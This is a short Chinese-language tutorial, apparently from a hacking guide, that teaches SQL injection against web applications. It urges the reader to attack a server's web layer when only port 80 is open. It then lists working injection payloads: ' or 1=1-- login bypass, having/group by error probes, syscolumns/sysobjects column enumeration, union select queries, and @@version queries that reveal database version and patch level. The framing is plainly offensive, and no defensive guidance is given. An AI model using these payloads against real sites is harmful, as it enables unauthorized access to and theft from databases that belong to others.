導讀： 簡介: 1、簡介當你看到一個服務器只開了80端口，這在一定程度上說明管理員把系統的補丁做的很好，我們所要做最有效的攻擊則也應該轉向WEB攻擊。SQL注射是最常用的攻擊方式。你攻擊 簡介:


1、簡介
當你看到一個服務器只開了80端口，這在一定程度上說明管理員把系統的補丁做的很好，我們所要做最有效的攻擊則也應該轉向WEB攻擊。SQL注射是最常用的攻擊方式。你攻擊WEN系統（ASP，PHP，JSP，CGI等）比去攻擊系統或者其他的系統服務要簡單的多。
SQL注射是通過頁面中的輸入來欺騙使得其可以運行我們構造的查詢或者別的命令，我們知道在WEB上面有很多供我們輸入參數的地方，比如用戶名、密碼或者E_mail。
2、漏洞測試
最開始我們應該從最簡單的來試：
- Login:' or 1=1--
- Pass:' or 1=1--
- http://website/index.asp?id=' or 1=1--
還有下面這樣的方式：
- ' having 1=1--
- ' group by userid having 1=1--
- ' SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'tablename')--
- ' union select sum(columnname) from tablename--
3、收集信息
- ' or 1 in (select @@version)--
- ' union all select @@version--
上面就可以得到系統的版本和補丁信息。